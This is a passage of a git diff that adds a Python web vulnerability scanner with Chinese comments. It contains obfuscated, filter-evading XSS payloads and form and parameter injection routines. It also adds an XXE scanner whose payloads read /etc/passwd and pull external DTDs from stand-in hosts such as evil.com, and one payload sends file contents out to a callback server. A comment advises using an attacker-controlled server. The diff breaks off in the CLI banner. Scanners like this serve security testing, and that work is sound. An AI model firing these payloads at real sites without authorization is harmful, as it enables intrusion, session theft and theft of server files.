+            f"<script>setTimeout(()=>{{eval(atob('{base64.b64encode(f'alert(\'{self.xss_mark}\')'.encode()).decode()}'))}})</script>",
+            f"<script>eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x27{self.xss_mark}\\x27\\x29')</script>",
+            f"<script>window['al'+'ert']('{self.xss_mark}')</script>",
+            f"<script>var a='al',b='ert';window[a+b]('{self.xss_mark}')</script>",
+            f"<svg><script>123<1>alert('{self.xss_mark}')</script>",
+            f"<svg><script>{{\\n}}alert('{self.xss_mark}')</script>",
+            f"<a href=javascript&colon;alert&lpar;'{self.xss_mark}'&rpar;>Click</a>",
+            f"<svg><animate onbegin=alert('{self.xss_mark}') attributeName=x></svg>",
+            f"<div style=width:1000px;overflow:hidden;>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<img src=x onerror=alert('{self.xss_mark}')>",
+            f"<img src=1 onerror=alert({self._to_js_string(self.xss_mark)})>",
+            f"<script>onerror=alert;throw'{self.xss_mark}';</script>",
+            f"<script>[].filter.call(1,alert,'{self.xss_mark}')</script>",
+            f"<script>Object.defineProperties(window, {{get onerror(){{return {{handleEvent: function(){{alert('{self.xss_mark}');}}}};}}}});throw 'test';</script>",
+            f"<script>({{}}).constructor.constructor('alert(\\'{self.xss_mark}\\')')();</script>",
+            f"<script>String.prototype.replace.call('xss','ss',(_,__)=>eval('aler'+'t(`{self.xss_mark}`)'))</script>",
+            f"<script>location='javascript:alert(\\'{self.xss_mark}\\');</script>",
+            f"<iframe srcdoc=\"<script>parent.alert('{self.xss_mark}')</script>\"></iframe>",
+            f"<script>[]['\\\140cons\\\140'+'tru\\\143tor']('\\\141\\\154\\\145\\\162\\\164\\\50\\\47{self.xss_mark}\\\47\\\51')();</script>",
+            f"<form id='xss'><input name='action' value='alert(\"{self.xss_mark}\")'></form><svg><use href='#xss' /></svg>",
+            f"<img src=x:alert('{self.xss_mark}') onerror=eval(src)>",
+            f"<script src='data:text/javascript,alert(\"{self.xss_mark}\")'></script>",
+            f"<object data='data:text/html;base64,{base64.b64encode(f"<script>alert('{self.xss_mark}')</script>".encode()).decode()}'></object>",
+            f"<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert('{self.xss_mark}')\">",
+            f"<iframe src=\"javascript:alert('{self.xss_mark}')\"></iframe>",
+            f"<form><button formaction=javascript:alert('{self.xss_mark}')>click</button></form>"
+        ]
+        
+        # 根据Payload级别返回对应的Payload列表
+        if self.payload_level == 1:
+            return basic_payloads
+        elif self.payload_level == 2:
+            return basic_payloads + standard_payloads
+        else:
+            return basic_payloads + standard_payloads + advanced_payloads
+    
+    def _load_payloads_from_file(self, filename, default_payloads=None):
+        """
+        从文件中加载Payload
+        
+        Args:
+            filename: Payload文件名
+            default_payloads: 默认Payload列表
+            
+        Returns:
+            list: Payload列表
+        """
+        import os
+        
+        # 获取当前模块所在目录
+        current_dir = os.path.dirname(os.path.abspath(__file__))
+        
+        # 构建Payload文件路径
+        payloads_dir = os.path.join(os.path.dirname(os.path.dirname(current_dir)), 'payloads', 'xss')
+        
+        # 如果目录不存在，则创建
+        if not os.path.exists(payloads_dir):
+            try:
+                os.makedirs(payloads_dir)
+            except Exception as e:
+                logger.error(f"创建Payload目录失败: {str(e)}")
+                return default_payloads
+        
+        payload_file = os.path.join(payloads_dir, filename)
+        
+        # 如果文件不存在，则返回默认Payload
+        if not os.path.exists(payload_file):
+            logger.warning(f"Payload文件不存在: {payload_file}")
+            return default_payloads
+        
+        try:
+            # 读取Payload文件
+            payloads = []
+            with open(payload_file, 'r', encoding='utf-8') as f:
+                for line in f:
+                    line = line.strip()
+                    # 忽略空行和注释
+                    if not line or line.startswith('#'):
+                        continue
+                    # 替换Payload中的占位符
+                    line = line.replace('XSS_MARK', self.xss_mark)
+                    line = line.replace('XSSMARK', self.xss_mark)
+                    line = line.replace('1', self.xss_mark)
+                    payloads.append(line)
+            
+            logger.info(f"从{payload_file}加载了{len(payloads)}个Payload")
+            return payloads
+        except Exception as e:
+            logger.error(f"加载Payload文件失败: {str(e)}")
+            return default_payloads
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的XSS漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描表单字段: {field.get('name')} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 获取针对特定WAF的绕过Payload
+        waf_payloads = self._get_waf_bypass_payloads()
+        
+        # 合并标准Payload和WAF绕过Payload
+        all_payloads = self.payloads + waf_payloads
+        
+        # 构建表单数据
+        for payload in all_payloads:
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 提交表单
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含Payload
+                if self._check_xss_in_response(response, payload):
+                    return {
+                        'type': 'XSS',
+                        'subtype': 'Reflected XSS',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现反射型XSS漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在XSS漏洞，可以执行任意JavaScript代码",
+                        'recommendation': "对用户输入进行过滤和编码，使用安全的前端框架，启用CSP策略"
+                    }
+            except Exception as e:
+                logger.error(f"扫描表单时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的XSS漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        logger.debug(f"扫描URL参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 获取针对特定WAF的绕过Payload
+        waf_payloads = self._get_waf_bypass_payloads()
+        
+        # 合并标准Payload和WAF绕过Payload
+        all_payloads = self.payloads + waf_payloads
+        
+        # 测试每个Payload
+        for payload in all_payloads:
+            # 构建新的查询参数
+            new_params = query_params.copy()
+            new_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(new_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                response = self.http_client.get(test_url)
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含Payload
+                if self._check_xss_in_response(response, payload):
+                    return {
+                        'type': 'XSS',
+                        'subtype': 'Reflected XSS',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现反射型XSS漏洞",
+                        'details': f"URL参数{param}存在XSS漏洞，可以执行任意JavaScript代码",
+                        'recommendation': "对用户输入进行过滤和编码，使用安全的前端框架，启用CSP策略"
+                    }
+            except Exception as e:
+                logger.error(f"扫描URL参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_dom(self, url):
+        """
+        扫描DOM型XSS漏洞
+        
+        Args:
+            url: 页面URL
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not self.use_browser or not self.driver:
+            logger.debug("浏览器未初始化，无法扫描DOM型XSS")
+            return None
+            
+        logger.debug(f"扫描DOM型XSS: {url}")
+        
+        vulnerable_sources = [
+            'document.URL', 'document.documentURI', 'document.URLUnencoded', 'document.baseURI',
+            'location', 'location.href', 'location.search', 'location.hash', 'location.pathname',
+            'document.referrer', 'window.name', 'history.pushState', 'history.replaceState',
+            'localStorage', 'sessionStorage', 'document.cookie', 'document.write'
+        ]
+        
+        try:
+            # 加载页面
+            self.driver.get(url)
+            
+            # 检查页面中是否存在可能的DOM XSS
+            for source in vulnerable_sources:
+                # 执行JavaScript检查
+                result = self.driver.execute_script(f"""
+                    var code = document.documentElement.innerHTML;
+                    if (code.indexOf("{source}") !== -1) {{
+                        return true;
+                    }}
+                    return false;
+                """)
+                
+                if result:
+                    return {
+                        'type': 'XSS',
+                        'subtype': 'DOM XSS',
+                        'url': url,
+                        'parameter': source,
+                        'payload': None,
+                        'severity': '高',
+                        'description': f"可能存在DOM型XSS漏洞，检测到敏感源'{source}'",
+                        'details': f"页面中使用了可能导致DOM型XSS的源'{source}'，需要进一步手动验证",
+                        'recommendation': "使用安全的JavaScript API，避免直接操作DOM，使用安全的前端框架，启用CSP策略"
+                    }
+        except TimeoutException:
+            logger.warning(f"页面加载超时: {url}")
+        except WebDriverException as e:
+            logger.error(f"浏览器发生错误: {str(e)}")
+        except Exception as e:
+            logger.error(f"扫描DOM型XSS时发生错误: {str(e)}")
+            
+        return None
+    
+    def scan_stored_xss(self, url, form, field, verify_url):
+        """
+        扫描存储型XSS漏洞
+        
+        Args:
+            url: 提交表单的URL
+            form: 表单信息
+            field: 字段信息
+            verify_url: 验证URL
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描存储型XSS: {field.get('name')} @ {url}, 验证URL: {verify_url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 获取针对特定WAF的绕过Payload
+        waf_payloads = self._get_waf_bypass_payloads()
+        
+        # 合并标准Payload和WAF绕过Payload
+        all_payloads = self.payloads + waf_payloads
+        
+        # 构建表单数据
+        for payload in all_payloads:
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 提交表单
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查表单提交后，访问验证URL是否包含Payload
+                verify_response = self.http_client.get(verify_url)
+                if not verify_response:
+                    continue
+                    
+                # 检查响应中是否包含Payload
+                if self._check_xss_in_response(verify_response, payload):
+                    return {
+                        'type': 'XSS',
+                        'subtype': 'Stored XSS',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现存储型XSS漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在存储型XSS漏洞，可以执行任意JavaScript代码",
+                        'recommendation': "对用户输入进行过滤和编码，使用安全的前端框架，启用CSP策略"
+                    }
+            except Exception as e:
+                logger.error(f"扫描存储型XSS时发生错误: {str(e)}")
+                
+        return None
+    
+    def _detect_technology(self, url):
+        """
+        检测网站使用的技术栈
+        
+        Args:
+            url: 目标URL
+        """
+        try:
+            # 发送请求
+            response = self.http_client.get(url)
+            if not response:
+                return
+                
+            # 使用技术检测器检测
+            self.tech_info = self.tech_detector.detect(response)
+            
+            frameworks = ", ".join(self.tech_info.get('frontend', []))
+            backends = ", ".join(self.tech_info.get('backend', []))
+            servers = ", ".join(self.tech_info.get('server', []))
+            wafs = ", ".join(self.tech_info.get('waf', []))
+            
+            if frameworks:
+                logger.info(f"检测到前端框架: {frameworks}")
+            if backends:
+                logger.info(f"检测到后端技术: {backends}")
+            if servers:
+                logger.info(f"检测到服务器: {servers}")
+            if wafs:
+                logger.info(f"检测到WAF: {wafs}")
+                
+                # 获取WAF绕过技术
+                bypass_techniques = self.tech_detector.get_waf_bypass_techniques(self.tech_info.get('waf', []))
+                for waf, techniques in bypass_techniques.items():
+                    logger.info(f"可能的{waf} WAF绕过技术:")
+                    for i, technique in enumerate(techniques, 1):
+                        logger.info(f"  {i}. {technique}")
+        except Exception as e:
+            logger.error(f"检测技术栈时发生错误: {str(e)}")
+    
+    def _get_waf_bypass_payloads(self):
+        """
+        根据检测到的WAF，获取对应的绕过Payload
+        
+        Returns:
+            list: 绕过Payload列表
+        """
+        if not self.tech_info.get('waf'):
+            return []
+            
+        # 使用WAF绕过专用的Payload
+        if self.waf_bypass_payloads:
+            return self.waf_bypass_payloads
+            
+        # 如果没有预加载的WAF绕过Payload，则返回空列表
+        return []
+    
+    def _check_xss_in_response(self, response, payload):
+        """
+        检查响应中是否包含XSS Payload
+        
+        Args:
+            response: 响应对象
+            payload: XSS Payload
+            
+        Returns:
+            bool: 是否包含Payload
+        """
+        # 如果响应为空，则返回False
+        if not response or not response.text:
+            return False
+            
+        # 检查响应中是否包含XSS标记
+        if self.xss_mark in response.text:
+            return True
+            
+        # 解析响应内容
+        try:
+            soup = BeautifulSoup(response.text, 'html.parser')
+            
+            # 检查是否存在alert弹窗（仅在使用浏览器时有效）
+            if self.use_browser and self.driver:
+                try:
+                    self.driver.get("data:text/html;charset=utf-8," + response.text)
+                    time.sleep(1)
+                    
+                    # 检查是否有弹窗
+                    alert = self.driver.switch_to.alert
+                    alert_text = alert.text
+                    alert.dismiss()
+                    
+                    if self.xss_mark in alert_text:
+                        return True
+                except:
+                    pass
+            
+            # 检查特定标签
+            for tag_name in ['script', 'img', 'svg', 'iframe', 'body', 'input', 'textarea', 'video', 'audio']:
+                tags = soup.find_all(tag_name)
+                for tag in tags:
+                    tag_str = str(tag)
+                    if self.xss_mark in tag_str:
+                        return True
+                        
+            # 检查特定属性
+            for tag in soup.find_all():
+                for attr in ['src', 'onerror', 'onload', 'onfocus', 'onblur', 'onclick', 'onmouseover']:
+                    if tag.has_attr(attr) and self.xss_mark in tag[attr]:
+                        return True
+        except Exception as e:
+            logger.error(f"检查XSS时发生错误: {str(e)}")
+            
+        return False
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length))
+    
+    def _to_js_string(self, s):
+        """
+        将字符串转换为JavaScript字符串
+        
+        Args:
+            s: 字符串
+            
+        Returns:
+            str: JavaScript字符串
+        """
+        js_escape_table = {
+            '\\': '\\\\',
+            '\r': '\\r',
+            '\n': '\\n',
+            '"': '\\"',
+            "'": "\\'"
+        }
+        
+        result = ''
+        for c in s:
+            if c in js_escape_table:
+                result += js_escape_table[c]
+            else:
+                result += c
+                
+        return f"'{result}'"
+    
+    def close(self):
+        """关闭资源"""
+        if self.use_browser and self.driver:
+            try:
+                self.driver.quit()
+            except:
+                pass
+            
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True
+        
+    def get_tech_info(self):
+        """获取技术检测信息"""
+        return self.tech_info 
\ No newline at end of file
diff --git a/xss_scanner/scanners/xxe_scanner.py b/xss_scanner/scanners/xxe_scanner.py
new file mode 100644
index 0000000..cf4deca
--- /dev/null
+++ b/xss_scanner/scanners/xxe_scanner.py
@@ -0,0 +1,439 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XXE（XML外部实体注入）扫描器模块，负责扫描XXE漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import uuid
+import base64
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class XXEScanner:
+    """XXE扫描器类，负责扫描XML外部实体注入漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化XXE扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成唯一标识符，用于检测XXE漏洞
+        self.xxe_id = str(uuid.uuid4()).replace('-', '')[:16]
+        
+        # XXE回调域名
+        # 注意：在实际使用中，应该使用攻击者控制的服务器
+        self.callback_domain = f"http://xxe-check.example.com/{self.xxe_id}"
+        self.dtd_server = f"http://dtd-server.example.com/{self.xxe_id}.dtd"
+        
+        # XXE检测Payload
+        self.payloads = [
+            # 基本外部实体声明
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <foo>&xxe;</foo>""",
+            
+            # 参数实体
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
+            %xxe;
+            ]>
+            <foo>Placeholder</foo>""",
+            
+            # 使用PHP封装器进行Base64编码
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >]>
+            <foo>&xxe;</foo>""",
+            
+            # 使用外部DTD
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo SYSTEM "{self.dtd_server}">
+            <foo>Placeholder</foo>""",
+            
+            # 使用参数实体引用外部DTD
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ENTITY % xxe SYSTEM "{self.dtd_server}">
+            %xxe;
+            ]>
+            <foo>Placeholder</foo>""",
+            
+            # 使用反射式外部实体
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ENTITY % file SYSTEM "file:///etc/passwd">
+            <!ENTITY % dtd SYSTEM "{self.dtd_server}">
+            %dtd;
+            ]>
+            <foo>Placeholder</foo>""",
+            
+            # 使用参数实体进行带外数据检索
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ENTITY % file SYSTEM "file:///etc/passwd">
+            <!ENTITY % all "<!ENTITY send SYSTEM '{self.callback_domain}?data=%file;'>">
+            %all;
+            ]>
+            <foo>&send;</foo>""",
+            
+            # SOAP请求中的XXE
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <SOAP-ENV:Envelope
+            xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+            xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+            xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+            <SOAP-ENV:Body>
+            <ns1:getResponse xmlns:ns1="urn:example" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+            <return xsi:type="xsd:string">&xxe;</return>
+            </ns1:getResponse>
+            </SOAP-ENV:Body>
+            </SOAP-ENV:Envelope>""",
+            
+            # SVG文件中的XXE
+            f"""<?xml version="1.0" standalone="yes"?>
+            <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
+            <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
+            <text font-size="16" x="0" y="16">&xxe;</text>
+            </svg>""",
+            
+            # 压缩文件解析中的XXE
+            f"""<!DOCTYPE foo [
+            <!ENTITY % remote SYSTEM "http://evil.com/xxe.dtd">
+            %remote;
+            ]>
+            <svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
+            <text>&exfil;</text>
+            </svg>""",
+            
+            # XXE in JSON request with Content-Type: application/xml
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <root>
+            <name>&xxe;</name>
+            <tel>+001</tel>
+            <email>user@example.com</email>
+            <password>secret</password>
+            </root>""",
+            
+            # 使用XML参数实体绕过WAF
+            f"""<?xml version="1.0" encoding="ISO-8859-1"?>
+            <!DOCTYPE foo [
+            <!ENTITY % sp SYSTEM "{self.dtd_server}">
+            %sp;
+            %param1;
+            ]>
+            <foo>Placeholder</foo>"""
+        ]
+        
+        # XXE成功特征
+        self.success_patterns = [
+            # Unix文件特征
+            "root:.*:0:0:",
+            "bin:.*:1:1:",
+            "daemon:.*:2:2:",
+            "sys:.*:3:3:",
+            "sync:.*:4:65534:",
+            "games:.*:5:60:",
+            "man:.*:6:12:",
+            "lp:.*:7:7:",
+            "[A-Za-z0-9_-]+:[^\n]*:[0-9]+:[0-9]+:[^\n]*:[^\n]*:[^\n]+",  # /etc/passwd行匹配
+            
+            # Windows系统文件特征
+            "\\[boot loader\\]",
+            "\\[operating systems\\]",
+            "\\[fonts\\]",
+            "\\[extensions\\]",
+            
+            # 特定应用程序配置文件
+            "DB_CONNECTION=",
+            "APP_KEY=",
+            "APP_ENV=",
+            "APP_DEBUG=",
+            
+            # Base64编码的文件内容
+            "^[A-Za-z0-9+/]{20,}={0,2}$",
+            
+            # XML解析错误
+            "XML syntax error",
+            "XML processing error",
+            "Undeclared entity",
+            "Undeclared general entity",
+            
+            # Java异常
+            "java.io.IOException",
+            "java.net.MalformedURLException",
+            "java.io.FileNotFoundException",
+            
+            # PHP异常
+            "Warning: simplexml_load_",
+            "DOMDocument::load",
+            "DOMDocument::loadXML",
+            
+            # Python异常
+            "lxml.etree.XMLSyntaxError",
+            "xml.etree.ElementTree",
+            
+            # .NET异常
+            "System.Xml",
+            "System.IO.FileNotFoundException",
+            
+            # 其他错误消息
+            "Permission denied",
+            "No such file or directory",
+            
+            # 回调ID
+            self.xxe_id
+        ]
+        
+        # 可能处理XML的内容类型
+        self.xml_content_types = [
+            'application/xml',
+            'text/xml',
+            'application/soap+xml',
+            'application/xhtml+xml',
+            'application/rss+xml',
+            'application/atom+xml',
+            'image/svg+xml',
+            'application/mathml+xml',
+            'application/vnd.google-earth.kml+xml'
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的XXE漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在XXE的字段名称
+        xxe_prone_fields = [
+            'xml', 'data', 'input', 'request', 'payload', 'content',
+            'body', 'message', 'text', 'document', 'file', 'upload'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in xxe_prone_fields):
+            return None
+            
+        logger.debug(f"扫描XXE: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测XXE漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload[:50]}...")
+                
+                # 对于XXE，我们尝试以XML内容类型发送请求
+                headers = {
+                    'Content-Type': 'application/xml'
+                }
+                
+                if method == 'POST':
+                    # 对于POST请求，我们尝试直接发送XML内容
+                    response = self.http_client.post(action_url, data=payload, headers=headers)
+                    
+                    # 如果失败，则尝试使用普通表单
+                    if not response or response.status_code >= 400:
+                        response = self.http_client.post(action_url, data=form_data)
+                else:
+                    # GET请求，使用普通表单
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_xxe_success(response.text):
+                    return {
+                        'type': 'XXE',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现XML外部实体注入(XXE)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在XXE漏洞，可以读取服务器上的敏感文件或进行SSRF攻击",
+                        'recommendation': "禁用XML解析器中的外部实体和DTD处理，使用安全的解析配置，过滤用户输入"
+                    }
+            except Exception as e:
+                logger.error(f"扫描XXE时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的XXE漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在XXE的参数名称
+        xxe_prone_params = [
+            'xml', 'data', 'input', 'request', 'payload', 'content',
+            'body', 'message', 'text', 'document', 'file', 'upload'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in xxe_prone_params):
+            return None
+            
+        logger.debug(f"扫描XXE参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测XXE漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试Payload: {payload[:50]}...")
+                
+                # URL参数中的XXE测试
+                response = self.http_client.get(test_url)
+                
+                # 如果GET请求失败或返回错误状态码，尝试POST请求
+                if not response or response.status_code >= 400:
+                    headers = {
+                        'Content-Type': 'application/xml'
+                    }
+                    response = self.http_client.post(url, data=payload, headers=headers)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_xxe_success(response.text):
+                    return {
+                        'type': 'XXE',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现XML外部实体注入(XXE)漏洞",
+                        'details': f"URL参数{param}存在XXE漏洞，可以读取服务器上的敏感文件或进行SSRF攻击",
+                        'recommendation': "禁用XML解析器中的外部实体和DTD处理，使用安全的解析配置，过滤用户输入"
+                    }
+            except Exception as e:
+                logger.error(f"扫描XXE参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_xxe_success(self, content):
+        """
+        检查响应内容中是否包含XXE成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含XXE成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查成功特征
+        for pattern in self.success_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        # 检查Base64编码的内容
+        # 尝试从内容中提取看起来像Base64的字符串
+        for potential_base64 in re.findall(r'[A-Za-z0-9+/]{20,}={0,2}', content):
+            try:
+                # 尝试解码
+                decoded = base64.b64decode(potential_base64).decode('utf-8', errors='ignore')
+                # 检查解码后的内容是否包含敏感信息
+                for pattern in self.success_patterns:
+                    if re.search(pattern, decoded, re.IGNORECASE):
+                        return True
+            except:
+                pass
+                
+        return False
+    
+    def check_callback_server(self):
+        """
+        检查回调服务器是否收到请求（在实际环境中实现）
+        
+        Returns:
+            bool: 是否收到回调请求
+        """
+        # 此功能在实际环境中需要实现
+        # 这里只是一个占位函数
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/ui/__pycache__/cli.cpython-313.pyc b/xss_scanner/ui/__pycache__/cli.cpython-313.pyc
new file mode 100644
index 0000000..8f9bb6e
Binary files /dev/null and b/xss_scanner/ui/__pycache__/cli.cpython-313.pyc differ
diff --git a/xss_scanner/ui/cli.py b/xss_scanner/ui/cli.py
new file mode 100644
index 0000000..c5e9936
--- /dev/null
+++ b/xss_scanner/ui/cli.py
@@ -0,0 +1,248 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+命令行界面模块，负责显示扫描器的交互界面
+"""
+
+import os
+import sys
+import time
+import logging
+from datetime import datetime
+
+# 定义颜色代码
+COLORS = {
+    'RED': '\033[91m',
+    'GREEN': '\033[92m',
+    'YELLOW': '\033[93m',
+    'BLUE': '\033[94m',
+    'PURPLE': '\033[95m',
+    'CYAN': '\033[96m',
+    'WHITE': '\033[97m',
+    'BOLD': '\033[1m',
+    'UNDERLINE': '\033[4m',
+    'RESET': '\033[0m'
+}
+
+def colored(text, color):
+    """
+    为文本添加颜色
+    
+    Args:
+        text: 文本内容
+        color: 颜色名称
+        
+    Returns:
+        str: 带颜色的文本
+    """
+    if color not in COLORS:
+        return text
+    return f"{COLORS[color]}{text}{COLORS['RESET']}"
+
+def display_banner():
+    """显示扫描器的Banner"""
+    banner = f"""
